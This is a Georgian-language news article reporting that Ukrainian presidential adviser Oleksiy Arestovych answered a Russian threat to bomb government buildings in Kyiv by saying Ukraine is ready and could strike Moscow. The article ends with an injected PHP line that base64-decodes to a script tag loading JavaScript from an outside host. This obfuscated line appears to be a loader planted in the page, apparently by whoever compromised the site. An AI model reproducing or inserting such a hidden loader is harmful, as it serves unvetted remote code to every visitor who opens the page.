celsiusi
ავერსი საქკაბელი
პრეზიდენტის აპარატის უფროსის მრჩეველი ალექსეი არესტოვიჩი გამოეხმაურა რუსეთის თავდაცვის სამინისტროს მუქარას, რომელიც აცხადებს, რომ დაბომბვას კიევში სამთავრობო შენობებს. დაბომბვას უკრაინა უპასუხებს, – ამის შესახებ პრეზიდენტის აპარატის უფროსის მრჩეველმა ალექსეი არესტოვიჩმა განაცხადა. 
 
არესტოვიჩის თქმით, უკრაინა მზად არის ასეთი სიტუაციისთვის, ვინაიდან კრემლისგან ყველაფერია მოსალოდნელი.
 
„უფრო მეტიც, ეჭვი არ მეპარება, რომ სამშვიდობო შეთანხმების დადებამდე  დაარტყავენ. მათ, ასევე, თქვეს, რომ დაარტყამდნენ იმ მმართველ ორგანოებს, რომლებშიც გადაწყვეტილებები მიიღება. მენეჯმენტი, უკრაინის ძალოვანი სტრუქტურების ყველა ცენტრალური აპარატი, შესაძლოა, უზენაესი რადა, მინისტრთა კაბინეტი, პრეზიდენტის აპარატი, ჩვენ ყოველთვის მზად ვართ ამისთვის“, – აღნიშნავს არესტოვიჩი
 
არესტოვიჩი, ასევე, დაემუქრა რუსეთს შურისძიებით და აღნიშნა, რომ უკრაინას აქვს შესანიშნავი შესაძლებლობები საპასუხო რეაქციისთვის.
 
„ჩვენ გვაქვს შესანიშნავი შესაძლებლობები დავარტყათ მოსკოვს“, – დასძინა არესტოვიჩმა.
979
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");